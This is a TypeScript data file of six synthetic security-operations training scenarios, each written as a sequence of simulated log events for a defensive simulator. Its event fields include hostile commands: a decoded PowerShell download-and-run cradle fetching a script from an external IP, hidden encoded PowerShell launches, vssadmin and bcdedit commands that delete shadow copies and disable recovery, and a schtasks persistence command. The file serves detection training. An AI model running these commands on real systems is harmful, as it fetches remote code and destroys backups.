import type { SimulationScenario } from "@vrsoc/types";

/**
 * Canonical Educational Simulation Scenarios.
 * 
 * Strict Educational & Safety Invariant:
 * All generated telemetry is synthetic and defensive. No real-world attacks,
 * live exploits, or malware payloads are executed.
 */
export const CANONICAL_SIMULATION_SCENARIOS: SimulationScenario[] = [
  {
    id: "scen-brute-force-auth-01",
    slug: "brute-force-auth",
    name: "Brute Force Authentication & Account Lockout",
    category: "Authentication Attacks",
    severity: "High",
    description:
      "Simulates an automated credential stuffing attack targeting enterprise accounts via NTLM/Kerberos. Demonstrates rapid authentication failures followed by domain account lockout.",
    learning_outcome:
      "Identify abnormal authentication failure frequency, inspect source IPs in authentication logs, verify user identity lock state, and recommend perimeter rate-limiting or MFA enforcement.",
    mitre_tactics: ["Credential Access", "Initial Access"],
    mitre_techniques: ["T1110.001 - Password Guessing", "T1110.003 - Password Spraying"],
    duration_seconds: 30,
    is_system: true,
    created_at: "2026-09-16T00:00:00Z",
    updated_at: "2026-09-16T00:00:00Z",
    event_sequence: [
      {
        step: 1,
        delay_ms: 500,
        description: "External connection established from anomalous IP to domain authentication service.",
        source: "Windows Security Log",
        source_type: "Authentication",
        category: "Authentication",
        event_type: "AUTH_ATTEMPT",
        severity: "Informational",
        log_level: "INFO",
        log_message: "EventID 4624: Network logon initiated for user 'admin_svc' from 185.220.101.42.",
        mitre_tactic: "Initial Access",
        mitre_technique: "T1078 - Valid Accounts",
        normalized_fields: {
          event_code: 4624,
          target_user: "admin_svc",
          src_ip: "185.220.101.42",
          auth_protocol: "NTLMv2",
          status: "Initiated",
        },
        network: {
          srcIp: "185.220.101.42",
          dstIp: "10.0.1.10",
          srcPort: 52144,
          dstPort: 88,
          protocol: "TCP",
          direction: "Inbound",
        },
      },
      {
        step: 2,
        delay_ms: 1200,
        description: "Multiple rapid authentication failures detected.",
        source: "Windows Security Log",
        source_type: "Authentication",
        category: "Authentication",
        event_type: "AUTH_FAILED",
        severity: "Medium",
        log_level: "WARN",
        log_message: "EventID 4625: An account failed to log on. User: 'admin_svc', Reason: Unknown user name or bad password.",
        mitre_tactic: "Credential Access",
        mitre_technique: "T1110.001 - Password Guessing",
        normalized_fields: {
          event_code: 4625,
          target_user: "admin_svc",
          src_ip: "185.220.101.42",
          failure_reason: "STATUS_LOGON_FAILURE",
          attempt_count: 5,
        },
      },
      {
        step: 3,
        delay_ms: 1500,
        description: "Brute-force threshold exceeded triggering security alert.",
        source: "Windows Security Log",
        source_type: "Authentication",
        category: "Authentication",
        event_type: "AUTH_FAILED_BURST",
        severity: "High",
        log_level: "ERROR",
        log_message: "EventID 4625: Critical threshold of 25 consecutive failed logins exceeded within 15 seconds.",
        mitre_tactic: "Credential Access",
        mitre_technique: "T1110.003 - Password Spraying",
        normalized_fields: {
          event_code: 4625,
          target_user: "admin_svc",
          src_ip: "185.220.101.42",
          failure_reason: "BRUTE_FORCE_BURST",
          attempt_count: 25,
        },
      },
      {
        step: 4,
        delay_ms: 1000,
        description: "Account lockout policy triggered.",
        source: "Windows Security Log",
        source_type: "Authentication",
        category: "Identity",
        event_type: "ACCOUNT_LOCKED",
        severity: "High",
        log_level: "CRIT",
        log_message: "EventID 4740: A user account was locked out. Target Account: 'admin_svc'.",
        mitre_tactic: "Impact",
        mitre_technique: "T1531 - Account Access Removal",
        normalized_fields: {
          event_code: 4740,
          target_user: "admin_svc",
          locked_by: "SYSTEM",
          duration_minutes: 30,
        },
      },
    ],
  },
  {
    id: "scen-powershell-encoded-exec-02",
    slug: "powershell-encoded-exec",
    name: "Suspicious Obfuscated PowerShell Execution & C2 Beacon",
    category: "Endpoint Execution",
    severity: "Critical",
    description:
      "Simulates an endpoint intrusion scenario where a malicious process executes base64-encoded PowerShell with execution policy bypass flags, followed by an outbound C2 connection attempt.",
    learning_outcome:
      "De-obfuscate command-line parameters, inspect EDR process tree lineage (cmd.exe -> powershell.exe), verify parent process GUIDs, and execute immediate host network containment.",
    mitre_tactics: ["Execution", "Defense Evasion", "Command and Control"],
    mitre_techniques: ["T1059.001 - PowerShell", "T1027 - Obfuscated Files or Information", "T1071.001 - Web Protocols"],
    duration_seconds: 45,
    is_system: true,
    created_at: "2026-09-16T00:00:00Z",
    updated_at: "2026-09-16T00:00:00Z",
    event_sequence: [
      {
        step: 1,
        delay_ms: 400,
        description: "Parent process cmd.exe spawned by interactive user session.",
        source: "Sysmon",
        source_type: "Endpoint",
        category: "Process",
        event_type: "PROCESS_CREATE",
        severity: "Informational",
        log_level: "INFO",
        log_message: "EventID 1: Process Create - cmd.exe initiated by user session.",
        mitre_tactic: "Execution",
        mitre_technique: "T1059.003 - Windows Command Shell",
        normalized_fields: {
          event_code: 1,
          image: "C:\\Windows\\System32\\cmd.exe",
          user: "j.miller",
        },
        process: {
          name: "cmd.exe",
          executablePath: "C:\\Windows\\System32\\cmd.exe",
          commandLine: "cmd.exe /c",
          integrityLevel: "Medium",
        },
      },
      {
        step: 2,
        delay_ms: 1200,
        description: "Obfuscated PowerShell spawned with execution policy bypass and hidden window.",
        source: "Sysmon",
        source_type: "Endpoint",
        category: "Process",
        event_type: "PROCESS_CREATE_SUSPICIOUS",
        severity: "Critical",
        log_level: "CRIT",
        log_message: "EventID 1: Suspicious Process Create - powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand SQBFAFgA...",
        mitre_tactic: "Execution",
        mitre_technique: "T1059.001 - PowerShell",
        normalized_fields: {
          event_code: 1,
          image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
          command_line: "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand SQBFAFgA...",
          sha256: "8596696b998cfb93902eb74f3ff5fcf216ef35ea555fae0da5c06be7c43d8a0d",
          decoded_command: "IEX(New-Object Net.WebClient).DownloadString('http://45.142.214.19/stage.ps1')",
        },
        process: {
          name: "powershell.exe",
          executablePath: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
          commandLine: "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand SQBFAFgA...",
          sha256: "8596696b998cfb93902eb74f3ff5fcf216ef35ea555fae0da5c06be7c43d8a0d",
          integrityLevel: "Medium",
        },
      },
      {
        step: 3,
        delay_ms: 1800,
        description: "Outbound HTTP connection attempt to known bulletproof hosting infrastructure.",
        source: "EDR Network Monitor",
        source_type: "Network",
        category: "Network",
        event_type: "NETWORK_C2_BEACON",
        severity: "High",
        log_level: "ERROR",
        log_message: "Outbound HTTP connection established to suspicious external IP 45.142.214.19:8080 by powershell.exe.",
        mitre_tactic: "Command and Control",
        mitre_technique: "T1071.001 - Web Protocols",
        normalized_fields: {
          src_ip: "10.0.4.84",
          dst_ip: "45.142.214.19",
          dst_port: 8080,
          threat_intel: "Known Bulletproof Host / Netherlands",
          bytes_transferred: 4096,
        },
        network: {
          srcIp: "10.0.4.84",
          dstIp: "45.142.214.19",
          srcPort: 49812,
          dstPort: 8080,
          protocol: "HTTP",
          direction: "Outbound",
        },
      },
    ],
  },
  {
    id: "scen-scheduled-task-persistence-03",
    slug: "scheduled-task-persistence",
    name: "Persistence via Scheduled Task Creation & Script Dropper",
    category: "Persistence Mechanism",
    severity: "High",
    description:
      "Simulates an adversary establishing persistence by dropping a helper script in AppData and registering a recurring Windows Scheduled Task.",
    learning_outcome:
      "Correlate Windows Event 4698 (Scheduled Task Created) with newly created batch scripts, analyze file hash signatures, and remediate persistence artifacts.",
    mitre_tactics: ["Persistence", "Privilege Escalation"],
    mitre_techniques: ["T1053.005 - Scheduled Task", "T1059.003 - Windows Command Shell"],
    duration_seconds: 30,
    is_system: true,
    created_at: "2026-09-16T00:00:00Z",
    updated_at: "2026-09-16T00:00:00Z",
    event_sequence: [
      {
        step: 1,
        delay_ms: 600,
        description: "Suspicious batch script dropped in user AppData folder.",
        source: "FIM Sensor",
        source_type: "Endpoint",
        category: "File",
        event_type: "FILE_CREATED",
        severity: "Medium",
        log_level: "WARN",
        log_message: "File Created: C:\\Users\\j.miller\\AppData\\Roaming\\sync_updater.bat",
        mitre_tactic: "Persistence",
        mitre_technique: "T1059.003 - Windows Command Shell",
        normalized_fields: {
          file_path: "C:\\Users\\j.miller\\AppData\\Roaming\\sync_updater.bat",
          sha256: "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
          size_bytes: 420,
        },
        file: {
          path: "C:\\Users\\j.miller\\AppData\\Roaming\\sync_updater.bat",
          name: "sync_updater.bat",
          extension: "bat",
          sizeBytes: 420,
          sha256: "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
          isExecutable: true,
          isHidden: true,
        },
      },
      {
        step: 2,
        delay_ms: 1400,
        description: "schtasks.exe invoked to register recurring hourly task.",
        source: "Windows Security Log",
        source_type: "Endpoint",
        category: "Process",
        event_type: "PROCESS_CREATE",
        severity: "High",
        log_level: "ERROR",
        log_message: "EventID 4698: A scheduled task was created. Task Name: '\\Microsoft\\Windows\\EnterpriseSyncUpdate'.",
        mitre_tactic: "Persistence",
        mitre_technique: "T1053.005 - Scheduled Task",
        normalized_fields: {
          event_code: 4698,
          task_name: "\\Microsoft\\Windows\\EnterpriseSyncUpdate",
          task_action: "C:\\Users\\j.miller\\AppData\\Roaming\\sync_updater.bat",
          schedule_frequency: "Hourly",
        },
        process: {
          name: "schtasks.exe",
          executablePath: "C:\\Windows\\System32\\schtasks.exe",
          commandLine: "schtasks.exe /create /tn \"EnterpriseSyncUpdate\" /tr \"C:\\Users\\j.miller\\AppData\\Roaming\\sync_updater.bat\" /sc hourly",
          integrityLevel: "Medium",
        },
      },
    ],
  },
  {
    id: "scen-ransomware-precursor-04",
    slug: "ransomware-precursor",
    name: "Ransomware Precursor & Volume Shadow Copy Deletion",
    category: "Ransomware & Destruction",
    severity: "Critical",
    description:
      "Simulates the critical pre-encryption phase of a ransomware attack: execution of vssadmin to delete volume shadow backups, disabling Windows Recovery, and rapid canary file tampering.",
    learning_outcome:
      "Recognize ransomware precursor commands (vssadmin delete shadows, bcdedit recoveryenabled No), prioritize high-severity incident escalation, and trigger emergency host isolation.",
    mitre_tactics: ["Impact", "Defense Evasion"],
    mitre_techniques: ["T1490 - Inhibit System Recovery", "T1486 - Data Encrypted for Impact"],
    duration_seconds: 30,
    is_system: true,
    created_at: "2026-09-16T00:00:00Z",
    updated_at: "2026-09-16T00:00:00Z",
    event_sequence: [
      {
        step: 1,
        delay_ms: 500,
        description: "vssadmin invoked to purge all Volume Shadow Copies.",
        source: "Sysmon",
        source_type: "Endpoint",
        category: "Process",
        event_type: "SHADOW_COPIES_DELETED",
        severity: "Critical",
        log_level: "CRIT",
        log_message: "EventID 1: High-risk command executed: vssadmin.exe delete shadows /all /quiet",
        mitre_tactic: "Impact",
        mitre_technique: "T1490 - Inhibit System Recovery",
        normalized_fields: {
          event_code: 1,
          command_line: "vssadmin.exe delete shadows /all /quiet",
          image: "C:\\Windows\\System32\\vssadmin.exe",
          risk_level: "CRITICAL_RANSOMWARE_INDICATOR",
        },
        process: {
          name: "vssadmin.exe",
          executablePath: "C:\\Windows\\System32\\vssadmin.exe",
          commandLine: "vssadmin.exe delete shadows /all /quiet",
          integrityLevel: "High",
        },
      },
      {
        step: 2,
        delay_ms: 1100,
        description: "bcdedit invoked to disable automated Windows boot recovery.",
        source: "Sysmon",
        source_type: "Endpoint",
        category: "Process",
        event_type: "RECOVERY_DISABLED",
        severity: "Critical",
        log_level: "CRIT",
        log_message: "EventID 1: High-risk command executed: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no",
        mitre_tactic: "Impact",
        mitre_technique: "T1490 - Inhibit System Recovery",
        normalized_fields: {
          command_line: "bcdedit.exe /set {default} recoveryenabled no",
          image: "C:\\Windows\\System32\\bcdedit.exe",
        },
        process: {
          name: "bcdedit.exe",
          executablePath: "C:\\Windows\\System32\\bcdedit.exe",
          commandLine: "bcdedit.exe /set {default} recoveryenabled no",
          integrityLevel: "High",
        },
      },
      {
        step: 3,
        delay_ms: 1600,
        description: "Mass canary file modification burst detected across documents directory.",
        source: "FIM Sensor",
        source_type: "Endpoint",
        category: "File",
        event_type: "MASS_FILE_MODIFICATION",
        severity: "Critical",
        log_level: "EMERG",
        log_message: "FIM Alert: Over 120 files modified with .locked extension in C:\\Users\\Public\\Documents within 2 seconds.",
        mitre_tactic: "Impact",
        mitre_technique: "T1486 - Data Encrypted for Impact",
        normalized_fields: {
          affected_files_count: 120,
          appended_extension: ".locked",
          target_path: "C:\\Users\\Public\\Documents\\",
        },
      },
    ],
  },
  {
    id: "scen-network-port-scan-05",
    slug: "network-port-scan",
    name: "Internal Port Scan & Network Reconnaissance",
    category: "Network Anomalies",
    severity: "Medium",
    description:
      "Simulates an adversary scanning internal subnets to discover open administrative ports (SSH, RDP, SMB, HTTP) across workstations and database servers.",
    learning_outcome:
      "Inspect firewall drop logs, track TCP SYN scan signatures (Nmap / Masscan), identify the source endpoint performing lateral reconnaissance, and formulate containment rules.",
    mitre_tactics: ["Reconnaissance", "Discovery"],
    mitre_techniques: ["T1046 - Network Service Discovery", "T1595.001 - Port Scanning"],
    duration_seconds: 30,
    is_system: true,
    created_at: "2026-09-16T00:00:00Z",
    updated_at: "2026-09-16T00:00:00Z",
    event_sequence: [
      {
        step: 1,
        delay_ms: 400,
        description: "Rapid TCP SYN connection attempts across sensitive administrative ports.",
        source: "Perimeter Firewall",
        source_type: "Network",
        category: "Network",
        event_type: "PORT_SCAN_SYN_BURST",
        severity: "Medium",
        log_level: "WARN",
        log_message: "Firewall Drop: Inbound SYN burst from 10.0.3.33 targeting ports 22, 80, 445, 3389 across 10.0.1.0/24 subnet.",
        mitre_tactic: "Discovery",
        mitre_technique: "T1046 - Network Service Discovery",
        normalized_fields: {
          src_ip: "10.0.3.33",
          target_subnet: "10.0.1.0/24",
          scanned_ports: [22, 80, 445, 3389],
          scan_type: "TCP_SYN_SWEEP",
        },
        network: {
          srcIp: "10.0.3.33",
          dstIp: "10.0.1.45",
          srcPort: 59102,
          dstPort: 3389,
          protocol: "TCP",
          direction: "Lateral",
          status: "Blocked",
        },
      },
      {
        step: 2,
        delay_ms: 1200,
        description: "Open SMB port discovered on enterprise database host.",
        source: "Perimeter Firewall",
        source_type: "Network",
        category: "Network",
        event_type: "SERVICE_DISCOVERY_SUCCESS",
        severity: "Medium",
        log_level: "INFO",
        log_message: "Session Established: Port 445 (SMB) connection accepted from 10.0.3.33 to 10.0.1.45.",
        mitre_tactic: "Discovery",
        mitre_technique: "T1046 - Network Service Discovery",
        normalized_fields: {
          src_ip: "10.0.3.33",
          dst_ip: "10.0.1.45",
          dst_port: 445,
          service: "SMB",
        },
        network: {
          srcIp: "10.0.3.33",
          dstIp: "10.0.1.45",
          srcPort: 59104,
          dstPort: 445,
          protocol: "TCP",
          direction: "Lateral",
          status: "Established",
        },
      },
    ],
  },
  {
    id: "scen-usb-unauthorized-hardware-06",
    slug: "usb-unauthorized-hardware",
    name: "Unauthorized USB Mass Storage Device Insertion",
    category: "Hardware Additions",
    severity: "Low",
    description:
      "Simulates an employee inserting an unapproved USB flash drive into a secured finance workstation, triggering device plug-and-play telemetry and policy violation audit logs.",
    learning_outcome:
      "Investigate device serial numbers and vendor IDs in hardware logs, enforce USB block policies, and prevent potential data exfiltration.",
    mitre_tactics: ["Initial Access", "Exfiltration"],
    mitre_techniques: ["T1091 - Replication Through Removable Media", "T1052.001 - Exfiltration over USB"],
    duration_seconds: 20,
    is_system: true,
    created_at: "2026-09-16T00:00:00Z",
    updated_at: "2026-09-16T00:00:00Z",
    event_sequence: [
      {
        step: 1,
        delay_ms: 500,
        description: "Plug and Play subsystem detected new USB mass storage device.",
        source: "Windows Kernel PnP",
        source_type: "Endpoint",
        category: "Hardware",
        event_type: "DEVICE_PLUGGED",
        severity: "Low",
        log_level: "INFO",
        log_message: "EventID 20001: Device Install (USBSTOR\\Disk&Ven_SanDisk&Prod_Ultra&Rev_1.00) completed successfully.",
        mitre_tactic: "Initial Access",
        mitre_technique: "T1091 - Replication Through Removable Media",
        normalized_fields: {
          vendor: "SanDisk",
          product: "Ultra USB 3.0",
          serial_number: "4C530001190325117441",
          device_class: "USB Mass Storage",
          drive_letter: "E:\\",
        },
      },
      {
        step: 2,
        delay_ms: 1000,
        description: "Corporate DLP policy warning logged for unapproved external media.",
        source: "Corporate DLP Sensor",
        source_type: "Endpoint",
        category: "Policy",
        event_type: "POLICY_VIOLATION",
        severity: "Medium",
        log_level: "WARN",
        log_message: "DLP Policy Warning: Removable storage usage detected on finance workstation without compliance exemption.",
        mitre_tactic: "Exfiltration",
        mitre_technique: "T1052.001 - Exfiltration over USB",
        normalized_fields: {
          policy_name: "SEC-POL-USB-RESTRICT",
          action_taken: "Audit_Only",
          user: "s.jenkins",
        },
      },
    ],
  },
];
